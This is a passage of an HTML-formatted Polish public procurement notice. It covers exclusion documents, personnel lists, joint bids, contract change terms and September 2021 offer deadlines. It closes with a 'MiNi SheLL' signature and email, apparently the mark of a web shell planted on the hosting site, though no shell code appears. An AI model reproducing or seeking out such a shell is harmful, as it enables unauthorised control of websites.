potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę<br/>częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi<br/>załącznik nr 6 do SWZ),</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>a) Wykaz osób – (załącznik nr 8 do SWZ), skierowanych przez Wykonawcę do realizacji zamówienia,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami z którego będzie wynikać, że Wykonawca tymi osobami dysponuje lub będzie dysponował.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Do oferty każdy Wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załączniku 1 do SWZ. Informacje zawarte w oświadczeniu będą stanowić<br/>wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w<br/>oświadczeniu, o którym mowa w pkt 1.<br/>3. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom w celu wykazania braku istnienia wobec nich podstaw wykluczenia zamieszcza informacje o tych<br/>podmiotach w oświadczeniu o którym mowa w pkt 1.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w pkt 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw wykluczenia.<br/>5. Do oferty Wykonawca załącza zobowiązanie podmiotu trzeciego albo inny dokument, służący wykazaniu udostępnienia Wykonawcy potencjału przez podmiot trzeci. Wzór zobowiązania stanowi załącznik nr 2 do SWZ.<br/>6. Pełnomocnictwo do podpisania oferty jeżeli upoważnienie do jej podpisania nie wynika z dokumentów rejestrowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie<br/>załącznik nr 1 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania a warunki udziału powinni spełniać łącznie wszyscy Wykonawcy. Każdy z Wykonawców ubiegających się wspólnie o zamówienie składa oświadczenie w zakresie art. 108 ust. 1 pkt 5 PZP. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony mają prawo do zgodnego skrócenia terminu realizacji Przedmiotu Umowy w każdym czasie, oraz do wydłużenia terminu realizacji Przedmiotu Umowy o okres trwania przyczyn z<br/>powodu których będzie zagrożone dotrzymanie tego terminu, w następujących sytuacjach:<br/>1) gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające należyte wykonanie robót w szczególności z powodu technologii realizacji prac określonych Umową, normami lub innymi przepisami wymagającymi odpowiednich warunków jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność. W<br/>takim przypadku termin realizacji zamówienia zostanie wydłużony o okres trwania wyżej wymienionej okoliczności.<br/>2) wystąpienia Siły wyższej (w szczególności powódź, huragan, trzęsienie ziemi, śnieżyca, uderzenia pioruna, gradobicie, tąpnięcia górnicze, epidemie, pożary, wojna, zamieszki krajowe,<br/>strajki, szkody wyrządzone przez dzikie zwierzęta, odnalezienie niewypałów, niewybuchów lub wykopalisk archeologicznych) uniemożliwiającej wykonanie Przedmiotu Umowy zgodnie z jej<br/>postanowieniami. W takim przypadku wydłużenie terminu nastąpi o okres niezbędny do usunięcia skutków działania siły wyższej.<br/>2. Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 7.8 litera c) SWZ– składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. WW.<br/>dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.<br/>b) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa<br/>w pkt. 7.8 litera c) SWZ zastępuje się je dokumentem zawierającym odpowiednio oświadczenie<br/>Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed<br/>organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty, powinny być wystawione nie wcześniej niż 3<br/>miesiące przed upływem terminu składania ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com